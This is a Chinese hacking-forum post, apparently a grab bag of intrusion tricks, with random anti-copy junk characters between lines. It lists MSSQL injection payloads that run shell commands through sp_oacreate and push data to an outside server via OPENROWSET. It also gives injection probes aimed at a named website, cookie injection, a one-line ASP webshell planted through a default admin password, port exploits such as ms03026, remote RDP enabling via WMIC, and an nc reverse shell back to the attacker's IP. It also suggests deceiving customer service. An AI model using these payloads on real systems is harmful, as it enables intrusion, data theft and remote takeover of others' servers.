SA点数据库分离技术相关
* @ a. E G9 ^7 W
/ l6 q4 R% J5 j
2 w1 b: Z/ y2 s% n# jSA点数据库分离搞法+语句:: y1 t, N; v( P( L/ D8 G
$ I. |! j7 z" n' k j: Q: V1 k注射点不显错,执行下面三条语句页面都返回正常。9 y% i$ z) g- j6 Z2 V' s9 t
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
2 u* x1 Z" r' J! f7 G' jand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
) K0 @9 x$ @ y; ]7 \3 @1 m. Hand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')1 U# n; k2 N) t" ?5 H
可以列目录,判断系统为2000,web与数据库分离6 ^7 t' o+ S. m; g) N; h* j6 p
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
l$ W' {: S0 ^# d' _: f在注射点上执行4 x3 \/ U3 D+ X2 S* b7 c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
7 ?" P$ I( a' o" O$ q$ Q- v: Q页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
i* @/ F" Y/ T还有我用NC监听得其他端口都没有得到IP。% `* ~0 H) N) j, y6 k# F
, u. f8 u# \) W& `8 }/ d
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
8 |" v* n% q. j* I'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--" p+ |# ^' H; J/ [5 t
/ ^. W% O! T+ A( Z; H) h;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--# Q; a8 s' a) O* {6 }
: N) L" }' o5 E4 j# H f9 _现在就猜想是不是数据库是内网而且不能连外网。
; ~# x" a2 u {; b% V2 _# D( z9 v3 z3 ~' G
$ z, U- {4 J U- C
access导出txt文本代码3 c( `* Y& A' n* S$ ~* R
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
( c/ \2 |' F: S! Y ^- j; t9 T5 m$ D+ u! P( T# ?; s% t; H
, Q* o: ^3 W% a3 ^% P( G$ H
9 @" a5 M, E/ u自动跳转到指定网站代码头
; l1 t" Z7 c* ~1 ~0 I) F<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>+ O4 y- R9 B- n' F" d! s8 t
6 c+ G( ]0 T: V, `. Z0 `% ?0 N, _% g3 ^8 i; e3 v
入侵java or jsp站点时默认配置文件路径:
- R9 t d$ Z4 z Z# v8 t\web-inf\web.xml+ s0 P4 r4 J; [* H" C
tomcat下的配置文件位置:
5 U+ M k- W _% F% e9 q# l8 C\conf\server.xml (前面加上tomcat路径)
9 a2 O3 `( q) I0 ^; K4 a, k# c\Tomcat 5.0\webapps\root\web-inf\struts-config.xml) h3 b# s6 g: ~0 ^ z; \
( g& n5 B, h* a& I3 D5 G1 Z/ J
! w" G6 e+ N7 T1 n
: q( J, o/ U& k8 V, ^1 w检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:9 i. t5 ?4 l J! a
-1%23
, a1 [5 X3 X$ [8 ~& w& [> % h5 o/ B* }+ d/ A5 k0 Z: n
<
* j8 _ Z0 ~/ L1 ?9 T% [" F1'+or+'1'='1, D8 i& W# _, G- g9 o0 n) K
id=8%bf7 l' Z: u: E6 F8 s8 R
; w+ K7 T g$ |7 ]( |7 D1 z全新注入点检测试法:
9 ~9 k2 t- `, G4 d# [( T在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
: c0 O# J, _6 f c- k, _; `
0 S3 }/ M8 e8 a2 g% x在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。$ H+ T6 X& A. q
, n' ?' O' q8 P+ ^2 W" n. X
搜索型注入判断方法:( x5 N5 H) x, R
北京%' and '1'='1' and '%'='. r' O$ h1 A* k; X* g
北京%' and '1'='2' and '%'='% A" c: q! X- |- A7 q3 f2 K
8 a7 J/ r9 K5 C- W; `# G
1 n% r' V. W- \3 j/ h
COOKIES注入:
, x6 E6 j) o' v( F
: Z1 }+ l- i8 |, f& t: hjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
% Y, K0 f, M4 g" x
5 ~3 o% G1 v9 v2000专业版查看本地登录用户命令:) S: o2 X0 e9 l: H9 y4 d
net config workstation
( _8 B2 W$ G8 I! Q
4 I1 e6 }% R8 p+ O3 z. Q# @% j5 t, E; m- \# u( r% K
2003下查看ipsec配置和默认防火墙配置命令:
( x" N `; b$ N9 ?9 g, ~7 l1 G$ R+ xnetsh firewall show config: w5 m [+ g, ^+ j9 }) @! j+ m
netsh ipsec static show all
# }+ z& M1 ^; f. r2 w" }
% ]9 ~5 G+ o7 \0 M# O不指派指定策略命令:- y. ]+ ~- \1 C3 }+ I0 v
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)5 x% R5 U! [8 `4 \- a6 o# I
netsh ipsec static show policy all 显示策略名; d1 D8 Q5 }' ^/ |: Y
4 S+ y# e# F1 i+ @9 q/ I( ]+ A: Y2 L( m# r) x0 v
猜管理员后台小技巧:
- w* f3 ~6 e8 C" madmin/left.asp # H; D) g+ v i- L3 ^. S$ ?
admin/main.asp
/ K: Q$ |9 Z" Y. Q9 h, K7 ]% Nadmin/top.asp+ A( O( ]0 R2 s' y% `) y
admin/admin.asp
& `7 X# Y$ {4 Y会现出菜单导航,然后迅雷下载全部链接 X) A' Z W3 @: r4 [; q
( p/ _4 n9 ]+ y) c' P5 ?' g
' i$ b% F9 [) D$ B X- S4 Z* P
社会工程学:
( [( U2 g9 \: I) z* v用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人5 [4 P! _7 b9 q
然后去骗客服
% }3 s. r$ l+ o# o9 f, \4 e7 j, J" q( M0 P6 |$ b5 f
( p' G0 F* Z5 y- @2 U7 k6 L2 w) i) W
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: ! B. F: u8 Y. u2 G: l; J* M9 G
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
* _6 K6 X7 ]' I1 F, p 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
/ u I/ `. t* j7 ~
6 b y& S+ u T# p( Y- {+ X, B) r% {- {9 G! P! C, c3 M+ I& q/ C
7 b" J8 q% O; J0 m$ O2 _; Y0 n
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
# T( P% Z; Z' y6 I2 v* j+ H J, L3 Y
) Y' c, p3 S" T% p8 u$ s$ a5 h3 T z# P
CMD加密注册表位置
7 F5 F) o& S7 o3 {(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
8 m8 s8 z" ~+ W* [3 X0 |* kAutoRun/ j ~! t7 ?5 d7 _/ k; [
, }, b6 l8 g- T* y5 V+ y" U
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor6 p% } _( s+ j# A& x, g
AutoRun& V V: v0 Z6 H
$ j/ o6 C* ?+ x$ h
3 p& u( W* g+ i L在找注入时搜索Hidden,把他改成test% s8 V( q0 T9 q
' Y8 a5 w+ r3 N- C4 L" M2 f( F, h
. U5 ?" |+ V# J, c {# f* g7 g- [, \/ B5 f
mstsc /v:IP /console + n2 E, x; z' F9 K4 o: A
' v x1 X7 x9 `; V
% w# R$ Y' l- S" w, |4 w# B; r! z
一句话开3389:/ E6 x! ]( P. `1 J8 m( C9 x
# ?3 O; f' b3 v3 k最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
5 {; J- @7 h5 F1 U4 u开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.% z L3 ]5 Z# {$ C, }# o
2 j- S+ R! b4 ~* u0 I: s- W8 t5 G. @" j
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:. E3 j# U) A' D2 d$ e% S! L* |/ q
Insert into admin(user,pwd) values('test','test')
~4 J8 K) w) a( k# e4 R
: N0 p4 z, [7 p
. {; M0 m0 m( I- I4 {' T+ j! ?NC反弹
6 Z9 N( Y! u! Z6 ]2 M先在本机执行: nc -vv -lp 监听的端口 (自己执行)
+ A& d, c. F/ y然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
3 i" j# n0 E8 i3 y0 q" ~
3 g. z& q4 x, e0 e) v/ x! ~
7 m& H0 z/ h( g在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
1 h, E: z% L7 a8 P k
/ {8 E: G. |' z4 w6 h3 H有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录4 }; N! P; ]( z0 L& O9 U& W" C
例如:
; l E/ i- T) rsubst k: d:\www\ 用d盘www目录替代k盘. v- j7 _0 q2 Y3 J8 N, O% Z4 K
subst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对